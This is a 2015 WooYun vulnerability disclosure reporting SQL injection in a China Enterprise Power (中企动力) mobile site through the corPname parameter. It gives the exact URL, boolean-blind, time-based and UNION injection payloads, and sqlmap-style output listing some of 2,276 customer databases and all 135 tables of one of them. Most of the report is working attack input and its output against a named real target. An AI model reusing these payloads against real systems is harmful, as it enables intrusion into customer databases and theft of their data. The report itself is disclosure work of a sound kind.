当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116007

漏洞标题:中企动力某站SQL注射影响大量二千多个库

相关厂商:中企动力科技股份有限公司

漏洞作者: 路人甲

提交时间:2015-05-25 10:32

修复时间:2015-07-09 10:52

公开时间:2015-07-09 10:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-25: 细节已通知厂商并且等待厂商处理中
2015-05-25: 厂商已经确认,细节仅向厂商公开
2015-06-04: 细节向核心白帽子及相关领域专家公开
2015-06-14: 细节向普通白帽子公开
2015-06-24: 细节向实习白帽子公开
2015-07-09: 细节向公众公开

简要描述:

233

详细说明:

http://m.300.cn/Maps.do?corPname=&method=showFilter 
参数corPname

漏洞证明:

---
Parameter: corPname (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: corPname=' AND 2862=2862 AND 'wtwI' LIKE 'wtwI&method=showFilter
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: corPname=' AND (SELECT * FROM (SELECT(SLEEP(5)))cAvP) AND 'Reak' LIKE 'Reak&method=showFilter
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: corPname=' UNION ALL SELECT CONCAT(0x717a7a7071,0x5377745458554d554462,0x7171707671),NULL#&method=showFilter
---
web application technology: JSP
back-end DBMS: MySQL 5.0.12
available databases [2276]:
[*] BAOAN055764M
[*] BAOAN193637M
[*] BAOAN290207M
[*] BAOAN316560M
[*] BAOAN500611M
[*] BAOAN551057M
[*] BAOAN570697M
[*] BAOAN671455M
[*] BAOAN865867M
[*] BAODING038855M
[*] BAODING302093M
[*] BAODING313472M
[*] BAODING564086M
[*] BAODING657127M
[*] BAODING821454M
[*] BAODING917245M
[*] BAODING940549M
[*] BEIJING003128M
[*] BEIJING070573M
[*] BEIJING071397M
[*] BEIJING091098M
[*] BEIJING094983M
[*] BEIJING171263M
[*] BEIJING184237M
[*] BEIJING188561M
[*] BEIJING210859M
[*] BEIJING215094M
[*] BEIJING274834M
[*] BEIJING299147M
[*] BEIJING303404M
[*] BEIJING406118M
[*] BEIJING411224M
[*] BEIJING436382M
[*] BEIJING470420M
[*] BEIJING476950M
[*] BEIJING544569M
[*] BEIJING565392M
[*] BEIJING583723M
[*] BEIJING676322M
[*] BEIJING682415M
[*] BEIJING697645M
[*] BEIJING717268M
[*] BEIJING725912M
[*] BEIJING726889M
[*] BEIJING763118M
[*] BEIJING782852M
[*] BEIJING798417M
[*] BEIJING852312M
[*] BEIJING872917M
[*] BEIJING974008M
[*] BEIJING984295M
[*] BEIJING986206M
[*] CHANGCHUN044592M
[*] CHANGCHUN046057M
[*] CHANGCHUN057245M
[*] CHANGCHUN072022M
[*] CHANGCHUN121326M
[*] CHANGCHUN134224M
[*] CHANGCHUN141840M
[*] CHANGCHUN155082M
[*] CHANGCHUN286878M
[*] CHANGCHUN484741M
[*] CHANGCHUN557524M
[*] CHANGCHUN571265M
[*] CHANGCHUN581754M
。。。。。。。
随便打开一个
Database: ZTS_ZM_KO_2014031200065
[135 tables]
+------------------------------+
| T_ADCATEGORY |
| T_ADINFOS |
| T_BINDWEB |
| T_BIZREMIND |
| T_CATEGORYRIGHT |
| T_CHANNEL_INFO_COUNT |
| T_CLIENT_VERSION |
| T_COLUMNS |
| T_COMPANYPURCHASE |
| T_CRASHINFO |
| T_CUSTOMER |
| T_CUSTOMERGROUP |
| T_CUSTOMER_CARE |
| T_CUSTOMER_FOLLOWUP |
| T_CUSTOMER_GROWTH_STATISTICS |
| T_CUSTOMER_INFO_MAP |
| T_CUSTOMER_POINT |
| T_CUSTOMFORM_CATEGORY |
| T_CUSTOMFORM_CONTENT |
| T_CUSTOMFORM_DATA |
| T_CUSTOMFORM_RELATION |
| T_DELETETASK |
| T_DOWNLOADCATEGORY |
| T_DOWNLOADFILE |
| T_DOWNLOADFILECALL |
| T_EBIZ_MODULEKEYWORDS |
| T_EBIZ_SEOSPREAD |
| T_EBIZ_SUBMITINFO |
| T_EBIZ_USERINFO |
| T_FAVORITES |
| T_FILEINFO |
| T_FLASH |
| T_FREECALL |
| T_FREECALLLOG |
| T_HOTKEYWORD |
| T_IMAGE |
| T_IMAGECATEGORY |
| T_IMAGEREFER |
| T_INFOCATEGORY |
| T_INFOCONTENT |
| T_INFOEXTEND |
| T_INFORECORD |
| T_INFORELAFORCATE |
| T_INFORELATION |
| T_INFO_AUTHOR |
| T_INFO_SOURCE |
| T_INQUIRYDETAIL |
| T_INQUIRYSHEET |
| T_LANGUAGE |
| T_LINK |
| T_LINKCATEGORY |
| T_LOGININFO |
| T_LOGISTICS |
| T_MAILHISTORY |
| T_MAILTEMPLATE |
| T_MAPCARD |
| T_MAPGUIDEINFO |
| T_MAPLABELINFO |
| T_MARK |
| T_MBATTRIBUTE |
| T_MBATTRIBUTESORT |
| T_MBCATEGORY |
| T_MBCONTENT |
| T_MBEXTENDCONTENT |
| T_MBREVESION |
| T_MEMBER |
| T_MEMBER_INFOCATEGORY |
| T_MEMBER_INFOCONTENT |
| T_MEMBER_LEVEL_DEF |
| T_MENU |
| T_MOBILECONTENTEXTEND |
| T_MODULEIMGCATEGORY |
| T_MYADDRESSBOOK |
| T_NOTICE |
| T_ORDERS_CART |
| T_PADDING_MONEY |
| T_PAGECONTENT |
| T_PAGECONTENTCATEGORY |
| T_PAYGATEWAYINFO |
| T_PAYSTATUS |
| T_PERMISSIONS |
| T_PGCERTIFICATE |
| T_PICTURECATEGORY |
| T_PMBRAND |
| T_PMBRANDCATEGORY |
| T_PMCATEGORY |
| T_PRODUCT |
| T_PRODUCTAPPENDATTR |
| T_PRODUCTCATEGORISE |
| T_PRODUCTITEM |
| T_PRODUCTMARK |
| T_PRODUCTSPEC |
| T_PRODUCTSPECVALUE |
| T_PRODUCTTEMPLATES |
| T_PRODUCT_COLUMN |
| T_PRODUCT_DEFINESPECVALUE |
| T_PRODUCT_EXTATTRVAL |
| T_PRODUCT_IMGS |
| T_RELATEDPRODUCT |
| T_ROLEPERMISSIONS |
| T_ROLES |
| T_RSSCATEGORY |
| T_RSSINFO |
| T_RSSSOURCE |
| T_SAVEBOX |
| T_SITECONFIG |
| T_SLIDE |
| T_SLIDECATEGORY |
| T_SLIDEINFO |
| T_SMSCONFIG |
| T_SMSENTRY |
| T_SMSTEMPLATE |
| T_SMS_CONFIG |
| T_SMS_HISTORY |
| T_SMS_MASS |
| T_SMS_MASS_RECEIVER |
| T_SMS_PREPAID |
| T_SMS_TEMPLATE |
| T_SPECIFICATIONCONTENT |
| T_STYLEDEFINED |
| T_SUBSCRIPTION |
| T_THUMBNAIL |
| T_TQLOGFILE |
| T_TRUECALL |
| T_TRUECALLLOG |
| T_USER |
| T_USERPERMISSIONS |
| T_USERROLES |
| T_USERS |
| T_USER_PASSWORDRETRIEVE |
| T_VIDEO |
| T_VIDEOREFER |
| T_WECHAT_DETAIL |
| T_WECHAT_EVENT |
| T_WECHAT_KEYWORDS |
+------------------------------+
涉及大量信息

修复方案:

求 20 rank!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-05-25 10:51

厂商回复:

正在处理

最新状态:

暂无


漏洞评价:

评论